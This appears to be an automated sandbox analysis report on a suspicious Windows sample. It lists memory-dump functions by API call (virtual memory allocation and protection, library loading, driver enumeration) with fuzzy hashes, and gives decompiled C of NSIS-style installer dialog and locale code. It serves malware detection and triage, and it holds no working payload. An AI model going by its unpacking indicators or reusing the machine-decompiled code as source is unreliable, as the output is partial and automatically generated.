Associated: 00000001.00000002.4859428028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859481306.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859636138.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859683026.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859732529.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859786598.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859892187.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860199540.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860265743.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860375416.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: XgB
API String ID: 2295610775-796949446
Opcode ID: 23f64898245c7a8b5642f2b76d490ae2c21be458ceb9b1f3c1c58d2291370735
Instruction ID: 6b6802a92a84c0d1895eb5c997cd82d97c30a63e480feb254935e86212d72bfe
Opcode Fuzzy Hash: 23f64898245c7a8b5642f2b76d490ae2c21be458ceb9b1f3c1c58d2291370735
Instruction Fuzzy Hash: 4AD0C9325051205BC2402638AF0C84B6B9A9F563313228A36B5A6E11A0C6348C3286AC

Uniqueness

Uniqueness Score: -1.00%

Function 033AFD46 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 242serviceCOMMON

Download Yara Rule

APIs

CloseServiceHandle.ADVAPI32(0000002B,?,?,6F270C08,FB5BBFAC,?,-19E57113,?,?,?,-66F9A254), ref: 033B0097

Strings

Kt#O, xrefs: 033AFEDE

Memory Dump Source

Source File: 00000001.00000002.4862667877.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_33a0000_file.jbxd

Yara matches

Similarity

API ID: CloseHandleService
String ID: Kt#O
API String ID: 1725840886-1717824460
Opcode ID: 02f567b2b2abcce9c9cdd2711be2fa6d263a6014adc19016a4ad7d1e19992c21
Instruction ID: b1c81f538dd4c9b1af99444d359e9aef8f20e2917932bf2bb8841919b37ca3dc
Opcode Fuzzy Hash: 02f567b2b2abcce9c9cdd2711be2fa6d263a6014adc19016a4ad7d1e19992c21
Instruction Fuzzy Hash: E48183728142E54BCF3ACEF498993DE7FB55F42230F59455ED888AF983E3B445428741

Uniqueness

Uniqueness Score: -1.00%

Function 033AFDEE Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 210serviceCOMMON

Download Yara Rule

APIs

CloseServiceHandle.ADVAPI32(0000002B,?,?,6F270C08,FB5BBFAC,?,-19E57113,?,?,?,-66F9A254), ref: 033B0097

Strings

Kt#O, xrefs: 033AFEDE

Memory Dump Source

Source File: 00000001.00000002.4862667877.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_33a0000_file.jbxd

Yara matches

Similarity

API ID: CloseHandleService
String ID: Kt#O
API String ID: 1725840886-1717824460
Opcode ID: 5156e3df74c305a65a31ce901abbd03121a2d9c545b747391cfcb33666053684
Instruction ID: 6b5d94cf0cef4c9301e985551cb71ca469f74b784576568c74553403f56a210b
Opcode Fuzzy Hash: 5156e3df74c305a65a31ce901abbd03121a2d9c545b747391cfcb33666053684
Instruction Fuzzy Hash: 3C618E714182E58BCF3ACEF498993DE7FB59F42230F18498ED988AF983E7B445428751

Uniqueness

Uniqueness Score: -1.00%

Function 033AFE86 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 186serviceCOMMON

Download Yara Rule

APIs

CloseServiceHandle.ADVAPI32(0000002B,?,?,6F270C08,FB5BBFAC,?,-19E57113,?,?,?,-66F9A254), ref: 033B0097

Strings

Kt#O, xrefs: 033AFEDE

Memory Dump Source

Source File: 00000001.00000002.4862667877.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_33a0000_file.jbxd

Yara matches

Similarity

API ID: CloseHandleService
String ID: Kt#O
API String ID: 1725840886-1717824460
Opcode ID: 442b0e3d4ad4b6fabecceafa4a13421f387d8f16c50de3a10f45b721347cb4fc
Instruction ID: db97d2d2cf8b4f5e49cd9d2658245808b8770ee6edfb97e57d163c741a5063f0
Opcode Fuzzy Hash: 442b0e3d4ad4b6fabecceafa4a13421f387d8f16c50de3a10f45b721347cb4fc
Instruction Fuzzy Hash: 29516D728182D58BDB2ACEF498C93DEBFB59F41220F1C498DD984AF953E3B445428751

Uniqueness

Uniqueness Score: -1.00%

Function 033BCB81 Relevance: 2.4, APIs: 1, Instructions: 884libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,8E3D722A,?,033BCD41), ref: 033BC1CC

Memory Dump Source

Source File: 00000001.00000002.4862667877.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_33a0000_file.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 13758a1f62954e4a54de3c80b2f4611981a3fb40641ccd2cf4645d56eebd77bc
Instruction ID: 22d38ba97fd5813ae35560ef8f949967e25ba15b9f37574efca6d628223950f6
Opcode Fuzzy Hash: 13758a1f62954e4a54de3c80b2f4611981a3fb40641ccd2cf4645d56eebd77bc
Instruction Fuzzy Hash: 7852C8A591CBD79FC7138BBCA4723DAFF770D177A4368A2ADD1845B187E2920810C716

Uniqueness

Uniqueness Score: -1.00%

Function 033B2B8D Relevance: 1.8, APIs: 1, Instructions: 333libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,8E3D722A,?,033BCD41), ref: 033BC1CC

Memory Dump Source

Source File: 00000001.00000002.4862667877.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_33a0000_file.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 9ab6e65a77a070a47d3a17aaea58248a2c78033acca7ec4025f31109f052d31d
Instruction ID: 942a2b1241fca977b9a3c38cb3a72d60b6dcfcb53aeb9224be867cf70bf42d96
Opcode Fuzzy Hash: 9ab6e65a77a070a47d3a17aaea58248a2c78033acca7ec4025f31109f052d31d
Instruction Fuzzy Hash: BCC149766043099FDB38DE288CA17EB77B7EF95350F45452EDD8A8BA50D7309982CB02

Uniqueness

Uniqueness Score: -1.00%

Function 033AFF06 Relevance: 1.7, APIs: 1, Instructions: 162serviceCOMMON

Download Yara Rule

APIs

CloseServiceHandle.ADVAPI32(0000002B,?,?,6F270C08,FB5BBFAC,?,-19E57113,?,?,?,-66F9A254), ref: 033B0097

Memory Dump Source

Source File: 00000001.00000002.4862667877.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_33a0000_file.jbxd

Yara matches

Similarity

API ID: CloseHandleService
String ID:
API String ID: 1725840886-0
Opcode ID: cc978b53057c58b2be4b477195ff75bedb5e0f8e4444f7d9af8e17b4f45a670c
Instruction ID: 238c879f211ca90d1cba3a65b642b8e67c1da768d15bcc94c460f2438a7a1e73
Opcode Fuzzy Hash: cc978b53057c58b2be4b477195ff75bedb5e0f8e4444f7d9af8e17b4f45a670c
Instruction Fuzzy Hash: 2F518C624182E64BCF3ACEF498D92DEBFB58F42230F1C498DD584AF993E3A444428751

Uniqueness

Uniqueness Score: -1.00%

Function 033BCC1C Relevance: 1.7, APIs: 1, Instructions: 153memorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 033BC0C6: LoadLibraryA.KERNELBASE(?,8E3D722A,?,033BCD41), ref: 033BC1CC

NtAllocateVirtualMemory.NTDLL(188A1B59,?,E4B01181), ref: 033BCEA2

Memory Dump Source

Source File: 00000001.00000002.4862667877.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_33a0000_file.jbxd

Yara matches

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID:
API String ID: 2616484454-0
Opcode ID: 5513ba3fcc35f5a8bc6e3f3d1351ec2a429f5bcbef7330257a1a3d8c0bf53f34
Instruction ID: be2434d23735ade724232213c1028f73ec6a3f7ab5913dcadb40fc3912fadfcf
Opcode Fuzzy Hash: 5513ba3fcc35f5a8bc6e3f3d1351ec2a429f5bcbef7330257a1a3d8c0bf53f34
Instruction Fuzzy Hash: E6511275A04348CFDB74DE289C957DE37BAEF99350F44452DDC8A9B660DB3089868B02

Uniqueness

Uniqueness Score: -1.00%

Function 033AEDE0 Relevance: 1.6, Strings: 1, Instructions: 324COMMON

Download Yara Rule

Strings

rgKO, xrefs: 033AEDF1

Memory Dump Source

Source File: 00000001.00000002.4862667877.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_33a0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: rgKO
API String ID: 0-1476698209
Opcode ID: 5398c0dcf5679e27a718c365f71be0f4eeb11692b6592455c00c49894fab5eec
Instruction ID: 89e58b602e73687bff360443e8dfca2ff299c2d0b1815559e8396130f2a06112
Opcode Fuzzy Hash: 5398c0dcf5679e27a718c365f71be0f4eeb11692b6592455c00c49894fab5eec
Instruction Fuzzy Hash: CEA1FA6282C6EB66CB27CBFCF49929CBFA5DA03230F189A9CD5456B597F2E04102C745

Uniqueness

Uniqueness Score: -1.00%

Function 033BB61C Relevance: 1.6, APIs: 1, Instructions: 70fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?,9FF7EE0F,1CB44631,854E0F84,F4BC058D,-0000000131481B4C), ref: 033BB8EE

Memory Dump Source

Source File: 00000001.00000002.4862667877.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_33a0000_file.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: dd6c54e36e2a26c779b81c6c4c2392d31f9e77cfc97f640f7f876c96c62dbacc
Instruction ID: 691374815350a9ca218e7e683f808a6b5c3bf2b6f9185141a29259a171bf07cd
Opcode Fuzzy Hash: dd6c54e36e2a26c779b81c6c4c2392d31f9e77cfc97f640f7f876c96c62dbacc
Instruction Fuzzy Hash: 9E21257060830ADFCF24DE75C9D53EAB7B4AF54380F82402E9ECA8BA04C7348A41CA13

Uniqueness

Uniqueness Score: -1.00%

Function 033BE873 Relevance: 1.5, APIs: 1, Instructions: 48nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(77BB5354,?,?,?,?,033BDBFD,-0A6366F8), ref: 033BE954

Memory Dump Source

Source File: 00000001.00000002.4862667877.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_33a0000_file.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: b015d15f3d041a772bae139e74f3b2753ac72c97bc682966310393d1ea8c967a
Instruction ID: cd0288b1441936f97cfca28851b06fe6867648514b57abe455ca7ff2dae16cc3
Opcode Fuzzy Hash: b015d15f3d041a772bae139e74f3b2753ac72c97bc682966310393d1ea8c967a
Instruction Fuzzy Hash: AF01B572A442689FEB34CE5D8C846DA72EAAFD9310F494057DC09AB701C6709E058791

Uniqueness

Uniqueness Score: -1.00%

Function 033BEE62 Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

K32EnumDeviceDrivers.KERNEL32(00000001,033BF551,-0000000185D5D33F,033BA695,00000000,033AD9FC), ref: 033BEF6D

Memory Dump Source

Source File: 00000001.00000002.4862667877.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_33a0000_file.jbxd

Yara matches

Similarity

API ID: DeviceDriversEnum
String ID:
API String ID: 22031212-0
Opcode ID: d941b616638336a855a7f2d56ef9d75063031996f190963e7f0229f06dc7b68d
Instruction ID: cd7a0fb001ceae46ca4b0eddcb31dd1a14800d08fbda4d2ae395ee99874e7d6a
Opcode Fuzzy Hash: d941b616638336a855a7f2d56ef9d75063031996f190963e7f0229f06dc7b68d
Instruction Fuzzy Hash: 74F0A435604245CFDB28DE3C9EC42E97776AF88384F12862ACE0ACBE18D7349A054A40

Uniqueness

Uniqueness Score: -1.00%

Function 00403F64 Relevance: 51.4, APIs: 34, Instructions: 357
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E00403F64(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
				struct HWND__* _v28;
				void* _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				signed int _t36;
				signed int _t38;
				struct HWND__* _t48;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t117;
				int _t118;
				int _t122;
				signed int _t124;
				struct HWND__* _t127;
				struct HWND__* _t128;
				int _t129;
				intOrPtr _t130;
				long _t133;
				int _t135;
				int _t136;
				void* _t137;

				_t130 = _a8;
				if(_t130 == 0x110 || _t130 == 0x408) {
					_t34 = _a12;
					_t127 = _a4;
					__eflags = _t130 - 0x110;
					 *0x4236f0 = _t34;
					if(_t130 == 0x110) {
						 *0x42a228 = _t127;
						 *0x423704 = GetDlgItem(_t127, 1);
						_t91 = GetDlgItem(_t127, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x4216d0 = _t91;
						E00404463(_t127);
						SetClassLongW(_t127, 0xfffffff2,  *0x429208);
						 *0x4291ec = E0040140B(4);
						_t34 = 1;
						__eflags = 1;
						 *0x4236f0 = 1;
					}
					_t124 =  *0x40a368; // 0x2
					_t136 = 0;
					_t133 = (_t124 << 6) +  *0x42a240;
					__eflags = _t124;
					if(_t124 < 0) {
						L36:
						E004044AF(0x40b);
						while(1) {
							_t36 =  *0x4236f0;
							 *0x40a368 =  *0x40a368 + _t36;
							_t133 = _t133 + (_t36 << 6);
							_t38 =  *0x40a368; // 0x2
							__eflags = _t38 -  *0x42a244;
							if(_t38 ==  *0x42a244) {
								E0040140B(1);
							}
							__eflags =  *0x4291ec - _t136;
							if( *0x4291ec != _t136) {
								break;
							}
							__eflags =  *0x40a368 -  *0x42a244; // 0x2
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t133 + 0x14);
							E00406544(_t117, _t127, _t133, 0x43a000,  *((intOrPtr*)(_t133 + 0x24)));
							_push( *((intOrPtr*)(_t133 + 0x20)));
							_push(0xfffffc19);
							E00404463(_t127);
							_push( *((intOrPtr*)(_t133 + 0x1c)));
							_push(0xfffffc1b);
							E00404463(_t127);
							_push( *((intOrPtr*)(_t133 + 0x28)));
							_push(0xfffffc1a);
							E00404463(_t127);
							_t48 = GetDlgItem(_t127, 3);
							__eflags =  *0x42a2ac - _t136;
							_v28 = _t48;
							if( *0x42a2ac != _t136) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t48, _t117 & 0x00000008); // executed
							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100); // executed
							E00404485(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x4216d0, _t118);
							__eflags = _t118 - _t136;
							if(_t118 == _t136) {
								_push(1);
							} else {
								_push(_t136);
							}
							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
							__eflags =  *0x42a2ac - _t136;
							if( *0x42a2ac == _t136) {
								_push( *0x423704);
							} else {
								SendMessageW(_t127, 0x401, 2, _t136);
								_push( *0x4216d0);
							}
							E00404498();
							E00406507(0x423708, E00403F45());
							E00406544(0x423708, _t127, _t133,  &(0x423708[lstrlenW(0x423708)]),  *((intOrPtr*)(_t133 + 0x18)));
							SetWindowTextW(_t127, 0x423708); // executed
							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)), _t136);
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t133 - _t136;
								if( *_t133 == _t136) {
									continue;
								}
								__eflags =  *(_t133 + 4) - 5;
								if( *(_t133 + 4) != 5) {
									DestroyWindow( *0x4291f8); // executed
									 *0x4226e0 = _t133;
									__eflags =  *_t133 - _t136;
									if( *_t133 <= _t136) {
										goto L60;
									}
									_t73 = CreateDialogParamW( *0x42a220,  *_t133 +  *0x429200 & 0x0000ffff, _t127,  *(0x40a36c +  *(_t133 + 4) * 4), _t133); // executed
									__eflags = _t73 - _t136;
									 *0x4291f8 = _t73;
									if(_t73 == _t136) {
										goto L60;
									}
									_push( *((intOrPtr*)(_t133 + 0x2c)));
									_push(6);
									E00404463(_t73);
									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
									ScreenToClient(_t127, _t137 + 0x10);
									SetWindowPos( *0x4291f8, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
									E00401389( *((intOrPtr*)(_t133 + 0xc)), _t136);
									__eflags =  *0x4291ec - _t136;
									if( *0x4291ec != _t136) {
										goto L63;
									}
									ShowWindow( *0x4291f8, 8); // executed
									E004044AF(0x405);
									goto L60;
								}
								__eflags =  *0x42a2ac - _t136;
								if( *0x42a2ac != _t136) {
									goto L63;
								}
								__eflags =  *0x42a2a0 - _t136;
								if( *0x42a2a0 != _t136) {
									continue;
								}
								goto L63;
							}
						}
						DestroyWindow( *0x4291f8);
						 *0x42a228 = _t136;
						EndDialog(_t127,  *0x421ed8);
						goto L60;
					} else {
						__eflags = _t34 - 1;
						if(_t34 != 1) {
							L35:
							__eflags =  *_t133 - _t136;
							if( *_t133 == _t136) {
								goto L63;
							}
							goto L36;
						}
						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)), 0);
						__eflags = _t86;
						if(_t86 == 0) {
							goto L35;
						}
						SendMessageW( *0x4291f8, 0x40f, 0, 1);
						__eflags =  *0x4291ec;
						return 0 |  *0x4291ec == 0x00000000;
					}
				} else {
					_t127 = _a4;
					_t136 = 0;
					if(_t130 == 0x47) {
						SetWindowPos( *0x4236e8, _t127, 0, 0, 0, 0, 0x13);
					}
					_t122 = _a12;
					if(_t130 != 5) {
						L8:
						if(_t130 != 0x40d) {
							__eflags = _t130 - 0x11;
							if(_t130 != 0x11) {
								__eflags = _t130 - 0x111;
								if(_t130 != 0x111) {
									goto L28;
								}
								_t135 = _t122 & 0x0000ffff;
								_t128 = GetDlgItem(_t127, _t135);
								__eflags = _t128 - _t136;
								if(_t128 == _t136) {
									L15:
									__eflags = _t135 - 1;
									if(_t135 != 1) {
										__eflags = _t135 - 3;
										if(_t135 != 3) {
											_t129 = 2;
											__eflags = _t135 - _t129;
											if(_t135 != _t129) {
												L27:
												SendMessageW( *0x4291f8, 0x111, _t122, _a16);
												goto L28;
											}
											__eflags =  *0x42a2ac - _t136;
											if( *0x42a2ac == _t136) {
												_t99 = E0040140B(3);
												__eflags = _t99;
												if(_t99 != 0) {
													goto L28;
												}
												 *0x421ed8 = 1;
												L23:
												_push(0x78);
												L24:
												E0040443C();
												goto L28;
											}
											E0040140B(_t129);
											 *0x421ed8 = _t129;
											goto L23;
										}
										__eflags =  *0x40a368 - _t136; // 0x2
										if(__eflags <= 0) {
											goto L27;
										}
										_push(0xffffffff);
										goto L24;
									}
									_push(_t135);
									goto L24;
								}
								SendMessageW(_t128, 0xf3, _t136, _t136);
								_t103 = IsWindowEnabled(_t128);
								__eflags = _t103;
								if(_t103 == 0) {
									L63:
									return 0;
								}
								goto L15;
							}
							SetWindowLongW(_t127, _t136, _t136);
							return 1;
						}
						DestroyWindow( *0x4291f8);
						 *0x4291f8 = _t122;
						L60:
						if( *0x425708 == _t136 &&  *0x4291f8 != _t136) {
							ShowWindow(_t127, 0xa); // executed
							 *0x425708 = 1;
						}
						goto L63;
					} else {
						asm("sbb eax, eax");
						ShowWindow( *0x4236e8,  ~(_t122 - 1) & 0x00000005);
						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
							L28:
							return E004044CA(_a8, _t122, _a16);
						} else {
							ShowWindow(_t127, 4);
							goto L8;
						}
					}
				}
			}

0x00403f6f
0x00403f76
0x004040dd
0x004040e1
0x004040e5
0x004040e7
0x004040ec
0x004040f7
0x00404102
0x00404107
0x00404109
0x0040410b
0x0040410e
0x00404113
0x00404121
0x0040412e
0x00404135
0x00404135
0x00404136
0x00404136
0x0040413b
0x00404141
0x00404148
0x0040414e
0x00404150
0x00404190
0x00404195
0x0040419a
0x0040419a
0x0040419f
0x004041a8
0x004041aa
0x004041af
0x004041b5
0x004041b9
0x004041b9
0x004041be
0x004041c4
0x00000000
0x00000000
0x004041cf
0x004041d5
0x00000000
0x00000000
0x004041de
0x004041e6
0x004041eb
0x004041ee
0x004041f4
0x004041f9
0x004041fc
0x00404202
0x00404207
0x0040420a
0x00404210
0x00404218
0x0040421e
0x00404224
0x00404228
0x0040422f
0x0040422f
0x0040422f
0x00404239
0x0040424b
0x00404257
0x0040425c
0x00404266
0x0040426c
0x0040426e
0x00404273
0x00404270
0x00404270
0x00404270
0x00404283
0x0040429b
0x0040429d
0x004042a3
0x004042b8
0x004042a5
0x004042ae
0x004042b0
0x004042b0
0x004042be
0x004042cf
0x004042e5
0x004042ec
0x004042f6
0x004042fb
0x004042fd
0x00000000
0x00404303
0x00404303
0x00404305
0x00000000
0x00000000
0x0040430b
0x0040430f
0x00404334
0x0040433a
0x00404340
0x00404342
0x00000000
0x00000000
0x00404368
0x0040436e
0x00404370
0x00404375
0x00000000
0x00000000
0x0040437b
0x0040437e
0x00404381
0x00404398
0x004043a4
0x004043bd
0x004043c7
0x004043cc
0x004043d2
0x00000000
0x00000000
0x004043dc
0x004043e7
0x00000000
0x004043e7
0x00404311
0x00404317
0x00000000
0x00000000
0x0040431d
0x00404323
0x00000000
0x00000000
0x00000000
0x00404329
0x004042fd
0x004043f4
0x00404400
0x00404407
0x00000000
0x00404152
0x00404152
0x00404155
0x00404188
0x00404188
0x0040418a
0x00000000
0x00000000
0x00000000
0x0040418a
0x0040415b
0x00404160
0x00404162
0x00000000
0x00000000
0x00404172
0x0040417a
0x00000000
0x00404180
0x00403f88
0x00403f88
0x00403f8c
0x00403f91
0x00403fa0
0x00403fa0
0x00403fa6
0x00403fad
0x00403ff1
0x00403ff7
0x00404010
0x00404013
0x00404026
0x0040402c
0x00000000
0x00000000
0x00404032
0x0040403d
0x0040403f
0x00404041
0x00404060
0x00404060
0x00404063
0x00404068
0x0040406b
0x0040407b
0x0040407c
0x0040407e
0x004040b4
0x004040c4
0x00000000
0x004040c4
0x00404080
0x00404086
0x0040409f
0x004040a4
0x004040a6
0x00000000
0x00000000
0x004040a8
0x00404094
0x00404094
0x00404096
0x00404096
0x00000000
0x00404096
0x00404089
0x0040408e
0x00000000
0x0040408e
0x0040406d
0x00404073
0x00000000
0x00000000
0x00404075
0x00000000
0x00404075
0x00404065
0x00000000
0x00404065
0x0040404b
0x00404052
0x00404058
0x0040405a
0x00404430
0x00000000
0x00404430
0x00000000
0x0040405a
0x00404018
0x00000000
0x00404020
0x00403fff
0x00404005
0x0040440d
0x00404413
0x00404420
0x00404426
0x00404426
0x00000000
0x00403faf
0x00403fb4
0x00403fc0
0x00403fc9
0x004040ca
0x00000000
0x00403fe8
0x00403feb
0x00000000
0x00403feb
0x00403fc9
0x00403fad

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FA0
ShowWindow.USER32(?), ref: 00403FC0
GetWindowLongW.USER32(?,000000F0), ref: 00403FD2
ShowWindow.USER32(?,00000004), ref: 00403FEB
DestroyWindow.USER32 ref: 00403FFF
SetWindowLongW.USER32(?,00000000,00000000), ref: 00404018
GetDlgItem.USER32(?,?), ref: 00404037
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 0040404B
IsWindowEnabled.USER32(00000000), ref: 00404052
GetDlgItem.USER32(?,00000001), ref: 004040FD
GetDlgItem.USER32(?,00000002), ref: 00404107
SetClassLongW.USER32(?,000000F2,?), ref: 00404121
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404172
GetDlgItem.USER32(?,00000003), ref: 00404218
ShowWindow.USER32(00000000,?), ref: 00404239
KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040424B
EnableWindow.USER32(?,?), ref: 00404266
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040427C
EnableMenuItem.USER32(00000000), ref: 00404283
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040429B
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042AE
lstrlenW.KERNEL32(00423708,?,00423708,00000000), ref: 004042D8
SetWindowTextW.USER32(?,00423708), ref: 004042EC
ShowWindow.USER32(?,0000000A), ref: 00404420

Memory Dump Source

Source File: 00000001.00000002.4859355724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4859311809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859428028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859481306.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859636138.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859683026.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859732529.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859786598.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859892187.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860199540.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860265743.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860375416.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID:
API String ID: 121052019-0
Opcode ID: 0f645c2587df08bd01e23aba799d426afd4c2e1534118d29ef39e58b546f5509
Instruction ID: 63d0405a778065079f0a8243b170f3468528db945c37da0c1c9e117f306831cd
Opcode Fuzzy Hash: 0f645c2587df08bd01e23aba799d426afd4c2e1534118d29ef39e58b546f5509
Instruction Fuzzy Hash: 30C1D2B1600205EBDB306F61ED89E3A3A68EB94709F51053EF791B11F0CB795852DB2E

Uniqueness

Uniqueness Score: -1.00%

Function 00403BB6 Relevance: 42.2, APIs: 13, Strings: 11, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00403BB6(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x42a230;
				_t22 = E004068D4(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x423708;
					L"1033" = 0x30;
					 *0x437002 = 0x78;
					 *0x437004 = 0;
					E004063D5(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x423708, 0);
					__eflags =  *0x423708;
					if(__eflags == 0) {
						E004063D5(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x423708, 0);
					}
					lstrcatW(L"1033", _t76);
				} else {
					E0040644E(L"1033",  *_t22() & 0x0000ffff);
				}
				E00403E8C(_t78, _t90);
				 *0x42a2a0 =  *0x42a238 & 0x00000020;
				 *0x42a2bc = 0x10000;
				if(E00405EDE(_t90, 0x435800) != 0) {
					L16:
					if(E00405EDE(_t98, 0x435800) == 0) {
						E00406544(_t76, 0, _t82, 0x435800,  *((intOrPtr*)(_t82 + 0x118)));
					}
					_t30 = LoadImageW( *0x42a220, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x429208 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403E8C(_t78, __eflags);
							__eflags =  *0x42a2c0;
							if( *0x42a2c0 != 0) {
								_t33 = E0040563C(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B(1);
									goto L33;
								}
